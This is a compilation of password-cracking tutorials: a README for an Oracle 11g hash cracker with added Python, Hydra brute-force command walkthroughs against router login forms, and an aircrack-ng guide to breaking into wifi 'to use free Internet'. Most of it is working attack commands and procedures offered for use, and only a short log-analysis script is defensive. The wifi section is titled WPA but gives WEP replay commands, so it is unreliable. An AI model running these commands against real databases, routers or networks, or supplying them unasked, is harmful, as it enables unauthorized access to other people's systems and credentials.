How to Crack Oracle 11g Password Hashes


Download Windows Binary: thc-orakelcrackert11g.tar.gz

OrakelCrackert 1.00 released 20070926
=====================================
OrakelCrackert is an Oracle 11g database password hash cracker that uses a 
weakness in the Oracle password storage strategy. With Oracle 11g, case 
sensitive SHA1 based hashing is introduced. Storing passwords in a case 
sensitive way allows more possible password combinations, so password 
cracking takes longer. For example, for passwords built from the 
character set "[a-z][A-Z][0-9]#$_" that start with an alphabetic 
character, the number of possible combinations is 52/65 * 65 ^ passlength. 
For an 8 position password this means 254.915.850.312.500 combinations.

Since Oracle is still storing the DES based password hashes, an attack 
much faster than brute forcing can be launched for most (not all) 
passwords. To do so:

1 - Get both the Oracle < 11g and 11g password hash, for example by 
executing the query "select user, password, spare4 from sys.user$ where 
username = ".

2 - Crack the old DES based password hash (field "password") which is 
generated using the upper case version of the mixed case password 
(note: this is not applicable to all possible passwords in Oracle 11g).

3 - If the upper case password is found, calculate the SHA1 of the ASCII 
value of the password followed by the salt (nibble 41-60 of field 
SPARE4) and compare it with the SHA1 based password hash (nibble 1-40 of 
field SPARE4). Do this for every upper/lower case combination of the 
password until you have a match.

4 - Voila!

Using a password generated out of the character set 
"[a-z][A-Z][0-9]#$_" where passwords start with an alphabetic character 
(currently supported by OrakelCrackert), the number of password 
combinations shrinks to 26/39 * 39 ^ length (= step 2) + 2 ^ length (= 
step 3). A full brute force for an 8 position password will now at 
maximum 'just' take 3.568.006.173.910 tries. This is about 77 times 
less than the original value.

Example:
========
select name, password, spare4 from sys.user$ where name = 'THC';
THC,435D0D3C8468DBC4,S:D39F4CC16573323279E5E4E16D359D6C55DCC09202B03D5D74B6841CEA2E

USER_PASS = ASCII(USER + GUESSED_PASS)
PASS_UPPER = ORACLEHASH(USER_PASS)
FOR(ALL UPPER/LOWER CASE COMBINATIONS OF GUESSED_PASS)
	PASS_SALT = ASCII(PASS + SALT)
	GUESSED_CASE = SHA1(PASS_SALT)
	IF(GUESSED_CASE == SPARE4 HASH)
		DONE!

With real-life data:
USER_PASS = ASCII(THC + THC#) = 0x54484354484323
PASS_UPPER = ORACLEHASH(0x54484354484323) = 0x435D0D3C8468DBC4
FOR LOOP (only the correct guess):
	PASS_SALT = ASCII(tHC# + 0x02B03D5D74B6841CEA2E) = 0x7448432302B03D5D74B6841CEA2E
	GUESSED_CASE = SHA1(0x7448432302B03D5D74B6841CEA2E) = 0xD39F4CC16573323279E5E4E16D359D6C55DCC092
	IF(0xD39F4CC16573323279E5E4E16D359D6C55DCC092 == 0xD39F4CC16573323279E5E4E16D359D6C55DCC092)
		WE'VE GOT HIM!
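To make the SPARE4 layout concrete, here is an added Python example (my code, not part of OrakelCrackert or the README above) that splits an 11g SPARE4 value into digest and salt, checks whether a given password reproduces the stored digest (as a DBA would when auditing accounts for a known weak password), and computes the two keyspace figures quoted above. The sample row is the THC / tHC# example from the README; the keyspace helpers take the character-set sizes as parameters, so they generalise the README's 8-character figures to any length.

```python
import hashlib

# Sample row from the README example (user THC, password tHC#).
SAMPLE_SPARE4 = "S:D39F4CC16573323279E5E4E16D359D6C55DCC09202B03D5D74B6841CEA2E"


def parse_spare4(spare4):
    """Split an 11g SPARE4 value into (sha1_digest, salt).

    Layout as described above: 'S:' prefix, 40 hex nibbles of SHA-1
    output, then 20 hex nibbles (10 bytes) of salt.
    """
    if not spare4.startswith("S:"):
        raise ValueError("not an 11g 'S:' hash")
    body = spare4[2:]
    if len(body) != 60:
        raise ValueError("expected 60 hex nibbles after 'S:'")
    return bytes.fromhex(body[:40]), bytes.fromhex(body[40:])


def matches_spare4(password, spare4):
    """True if SHA1(password || salt) equals the stored digest.

    Case matters here, unlike for the legacy DES hash: 'THC#' and 'tHC#'
    hash to different digests under the same salt.
    """
    digest, salt = parse_spare4(spare4)
    return hashlib.sha1(password.encode("ascii") + salt).digest() == digest


def full_keyspace(length, symbols=65, alpha=52):
    """README formula: alpha/symbols * symbols^length, first char alphabetic."""
    return alpha * symbols ** (length - 1)


def reduced_keyspace(length, symbols=39, alpha=26):
    """Step 2 (case-folded DES search) plus step 3 (2^length case variants)."""
    return alpha * symbols ** (length - 1) + 2 ** length


if __name__ == "__main__":
    print(matches_spare4("tHC#", SAMPLE_SPARE4))  # True per the README example
    print(matches_spare4("THC#", SAMPLE_SPARE4))  # False: wrong case
    print(full_keyspace(8), reduced_keyspace(8))
```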

How to use Hydra

Say you have a wireless router to which you have forgotten the password. The easiest thing to do in this case is
to reset the router to factory defaults. However, if you have a lot of custom settings and your backup is
nonexistent, out-dated, corrupted, or the backup restored a password which you do not remember, you can
try a brute force attack on the router. From http://freeworld.thc.org/thc-hydra/, Hydra currently supports:
TELNET, FTP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD, HTTP-PROXY, LDAP2, LDAP3,
SMB, SMBNT, MS-SQL, MYSQL, POSTGRES, REXEC, RSH, RLOGIN, CVS, SNMP, SMTP-AUTH,
SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, SSH2, Teamspeak, Cisco auth, Cisco enable,
Cisco AAA (incorporated in telnet module)
For the sake of this document I will use a Linksys WRT54GL, hardware v1.1, Linksys firmware 4.30.11 and
dd-wrt v2.4sp1. The first thing you have to do is find out whether the device uses a username AND password to
login. Several devices only require a password to login to the device as admin, root, system, etc. The easiest
way to find this out is to go to the vendor's website and download the installation manual, which will give you this
information. For the Linksys firmware:
1. Boot BackTrack and login as root.
hydra -l "" -P wordlist.txt -f -v -e ns 192.168.1.1 http-get /
-l is for a username, which is null in this case
-P is a wordlist of passwords to try
-f stop hydra when it finds the password
-v is for verbose
-e ns additionally try an empty password (n) and the login name as the password (s)
192.168.1.1 is the IP of the AP
http-get is the correct option for this AP
/ is where you have to put in the username and password. In this case you have to put in the username
and password before you can do anything. You will have to figure this out for yourself as each device is
different.
2. Some other options you may need are:
-t TASKS run TASKS number of connects in parallel (default: 16)
You may have to adjust this number down as larger numbers may cause the router to crash or
misbehave. I usually use 10.
-v / -V verbose mode / show login+pass combination for each attempt
3. As I said earlier, http-get is the correct option for my Linksys AP (with the factory firmware). When you go to
the AP website a dialog box opens and prompts for a username and password. Each AP is different and as
such you will have to change options, as RaginRob found out. The following is a slightly modified version
from his tutorial.
Cracking Passwords Version 1.1 file:///D:/password10.html
23 of 45 2/15/2010 3:48 PM
I recently started playing around with Hydra and tried to hack my router. After searching the forum and
googling around a while I noticed that there are only some howto’s for routers that have http-auth
authentication. That is, when you go to 192.168.2.1 e.g. and before showing anything you have to enter login
and password in a popup. My router (T-Com Sinus 154 DSL Basic 3) and many others I’ve dealt with so far
work differently. When I want to login to my router, I have to go to 192.168.2.1, a web interface with a
password field shows up, and I have to enter the password which is then checked by /cgi-bin/login.exe via
http-post.
It was quite tricky to find out how to use this authentication with hydra, so I guess there are some of you that
can benefit from this. I’ll describe how I did it, so you can adapt the method and use it with your own router.
First of all I examined the login page of the web interface. Be sure to look at the frame source and not the
frameset. You should see the form and the action, here's what I saw:
The form is defined as:
<form name="tF" method="post" action="/cgi-bin/login.exe" onSubmit="evaltF();">
Somewhere in the form there will be the field that takes the password:
<input type="password" name="pws" class="stylepwd" size="12" maxlength="12">
This is probably the most important data you need. You need to write down the field name ("pws" in my
case). The size attribute comes in very handy too because it tells us that the password's max length is 12
characters.
After that I tried to get familiar with Hydra's options. I figured out that you need the following options:
hydra -l "" -P passwords.txt -t 1 -f -v -V 192.168.2.1 http-post-form /cgi-bin/login.exe:pws=^PASS^:loginpserr.htm
-l Sets the login name. In the end I don't need a login name but hydra gets kind of pissed when you don't pass
something, so I gave an empty string.
-P The wordlist to use for the password
-t 1 task only, not really necessary, I just wanted to make sure Hydra doesn't choke on too many requests
-f Hydra shall stop when a working password is found
-v be verbose. -V even more. I skipped that in the final version but it's ok for debugging
192.168.1.1 is victim's ip
http-post-form the method to use
/cgi-bin/login.exe:pws=^PASS^:loginpserr.htm
This is the most important part. Here we tell Hydra what to pass the passwords to. The argument consists of
three parts separated by “:”.
The first part is the script that takes the POST data, we found that in the frame source above.
The second part is the field name of the password field with an added =^PASS^. ^PASS^ is the variable that
hydra substitutes with the passwords in the wordlist.
The third part is the “incorrect” condition. Hydra has to find out somehow if the current password that was
send to the router is correct or not. You have to find a string that is actually IN A NEGATIVE RESPONSE
from the router. As we don’t have the password yet we can’t know what the router will send if the password is
correct, therefore we have to check if it is NOT, which we can find out easily. To find out what the router
sends back to hydra I used Wireshark.
Open up Wireshark, go to the router login page, start capturing and then login with a wrong password. After
that, stop capturing and apply a "http" filter. You will see the POST data sent from hydra to the router (you
should also see the "pws=blabla" in the details, that's where hydra sends the passwords from the wordlist).
Below that you'll find the router answer. In my case it says something like "This page has moved to
loginpserr.htm" packed in some basic HTML. So I used the string loginpserr.htm to validate the .. uhm...
faultiness. OMFG %-]
Hydra will consider a password as CORRECT when the router answer DOES NOT contain the given string.
So be sure to take an expression that somehow sounds like "incorrect" or "wrong". If you took "the" for
example, and the POSITIVE response would be something like "the password you entered was correct", hydra
will not recognize it as correct but incorrect.
If your router does not only need a password but also a username, you can easily add the according login
name to the last part. So if you need to send the field “login” or whatever it is called in your case with the
value “admin” as the only username you could use
/cgi-bin/login.exe:login=admin&pws=^PASS^:loginpserr.htm
When you need to try a whole username list then you can specify the list via
-L usernames.txt
and
/cgi-bin/login.exe:login=^USER^&pws=^PASS^:loginpserr.htm
For dd-wrt:
1. Boot BackTrack and login as root.
hydra -l admin -P wordlist.txt -f -e ns 192.168.1.1 http-get /login.asp
-l is for the username, which is admin in this case. dd-wrt allows the user to choose the username that is
required to login to the device, so it could be anything.
-P is a wordlist of passwords to try
-f stop hydra when it finds the password
-v is for verbose
-e ns additionally try an empty password (n) and the login name as the password (s)
192.168.1.1 is the IP of the AP
http-get is the correct option for this AP
/login.asp is the page where you have to put in the username and password. In this case you have to put in the username
and password before you can do anything. You will have to figure this out for yourself as each device is
different.
2. Some other options you may need are:
-t TASKS run TASKS number of connects in parallel (default: 16)
You may have to adjust this number down as larger numbers may cause the router to crash or
misbehave. I usually use 10.
-v / -V verbose mode / show login+pass combination for each attempt
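The same behaviour that makes the http-post-form attack work (many POSTs to the login handler, each answered with the wrong-password redirect) is what a defender sees in the router's or web server's access log. The following Python is an added example, not part of Hydra or either tutorial, that flags a client which accumulates 10 or more such failures within a sliding 60-second window. The log lines are constructed in Common Log Format; the login path and loginpserr.htm redirect are taken from the tutorial above, while the client addresses, timestamps and the 16-attempt burst are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (Common Log Format as many embedded web servers
# write it).  /cgi-bin/login.exe and loginpserr.htm come from the tutorial;
# the clients 192.168.2.50 / 192.168.2.7 and the times are invented.
_FAIL = ('{ip} - - [15/Feb/2010:15:48:{s:02d} +0100] '
         '"POST /cgi-bin/login.exe HTTP/1.0" 302 214')
SAMPLE_LINES = (
    ['192.168.2.50 - - [15/Feb/2010:15:48:01 +0100] "GET / HTTP/1.0" 200 1422']
    # 16 wrong-password POSTs within four seconds (hydra's default is 16 tasks)
    + [_FAIL.format(ip="192.168.2.50", s=2 + i // 4) for i in range(16)]
    + ['192.168.2.50 - - [15/Feb/2010:15:48:06 +0100] "GET /loginpserr.htm HTTP/1.0" 200 611']
    # a single mistyped password from an ordinary user
    + [_FAIL.format(ip="192.168.2.7", s=40)]
)

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def login_failures(lines, login_path="/cgi-bin/login.exe"):
    """Yield (client_ip, timestamp) for every POST to the login handler that
    the router answered with its wrong-password redirect (302)."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        if method == "POST" and path == login_path and status == "302":
            yield ip, datetime.strptime(ts, TIME_FMT)


def flag_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {client_ip: peak failures inside one window} for each client
    that reached `threshold` failed logins within the sliding `window`."""
    recent = defaultdict(deque)
    flagged = {}
    for ip, when in login_failures(lines):
        q = recent[ip]
        q.append(when)
        while when - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged


if __name__ == "__main__":
    print(flag_bruteforce(SAMPLE_LINES))  # {'192.168.2.50': 16}
```

Lowering -t as the tutorial suggests only spreads the same failures over a longer period, so a window of minutes rather than seconds is the more robust choice on a home router with very few legitimate logins.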

END of hydra

How to crack a WPA encrypted wifi network

To crack a WPA encrypted wifi network in order to use free Internet, you will need a compatible wifi card and BackTrack 5.
First download BackTrack 5 from here.
Download the ISO and burn it to a DVD, or you can run it in a virtual machine; in this case I am using VMware to run BackTrack.

So run BackTrack 5. After that you will see the desktop; then open a command terminal and type "airmon-ng". This command will show the interface, driver and chipset of your network card.

Then type this command: "airmon-ng start wlan0". wlan0 is the name of my interface.

Then you will see in the bottom left corner "monitor mode enabled on mon0", so I am using mon0 as my interface. After that type this command: "airodump-ng mon0". It will start scanning for wifi networks, and you will see BSSID, channel, encryption, ESSID etc. My ESSID is "homenet"; yours will be different. After that type this command: "airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0", filling in your bssid, channel and filename,
e.g. airodump-ng -c 3 -w wep --bssid 00:18:01:a7:c0:00 mon0
then press enter.

Then data will flow slowly, so to boost the data
open up a new command terminal and type "aireplay-ng -1 0 -a (bssid) mon0". If you have strong signals coming from the wifi card then you will see "Association successful".

Then type "aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0" and data will flow much faster. If you see "Use this packet?" press y and press enter.

After that open another command terminal, type "aircrack-ng (filename)*.cap" and press enter; it will now try to crack it. Then it will say "Key found" and the key, e.g. 12:34:56. The colons are not part of the password, so remove them.

So now you have the wireless password. Remember to use this knowledge for good, not for evil; be ethical.

Commands that i have used

1)airmon-ng
2)airmon-ng start wlan0
3)airodump-ng mon0
4)airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0
5)aireplay-ng -1 0 -a (bssid) mon0
6)aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
7)aircrack-ng (filename)*.cap